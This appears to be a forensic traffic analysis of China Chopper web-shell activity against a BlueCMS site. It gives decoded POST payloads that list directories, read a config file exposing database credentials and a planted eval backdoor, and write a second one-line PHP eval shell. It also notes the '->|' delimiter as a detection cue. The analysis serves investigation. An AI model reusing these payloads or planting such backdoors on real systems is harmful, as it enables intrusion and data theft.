z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// list every file in the target server's C:\\phpstudy\\WWW\\bluecms\\ directory
->|./ 2017-09-07 08:33:05 0 0777
../ 2017-09-07 08:27:01 0 0777
admin/ 2017-09-07 08:27:01 0 0777
backup/ 2017-09-07 08:27:01 0 0777
cache/ 2017-09-07 08:27:01 0 0777
compile/ 2017-09-08 02:30:03 0 0777
upload/ 2017-09-07 08:27:01 0 0777
bannedip.cache.php 2017-09-08 09:24:52 25 0666
config.cache.php 2017-09-07 08:33:05 550 0666
config.php 2017-09-08 09:27:58 276 0666
index.htm 2009-10-02 12:46:24 894 0666
update_log.txt 2017-09-07 08:42:58 8 0666
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[z0 base64 omitted]&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List all files in the C:\\phpstu directory on the target server
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// Read the contents of C:\\phpstudy\\WWW\\bluecms\\data\\config.php
->|<?php
$dbhost = "localhost";
$dbname = "bluecms";
$dbuser = "root";
$dbpass = "123456";
$pre = "blue_";
$cookiedomain = '';
$cookiepath = '/';
@eval($_POST['Bshell']);
define('BLUE_CHARSET','gb2312');
define('BLUE_VERSION','v1.6');
?>|<-
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// Write <?php eval($_POST['cmd_shell']);?> into C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=[z0 base64 omitted]&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\
// List all files in the C:\\phpstudy\\WWW\\bluecms\\data\\ directory on the target server
--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
// Read the contents of C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
->|<?php eval($_POST['cmd_shell']);?>|<
You can also search for the delimiter that China Chopper (菜刀) uses to separate the output of its own command from the HTML the program itself emits, for example: ->|
At this point the analysis is essentially complete.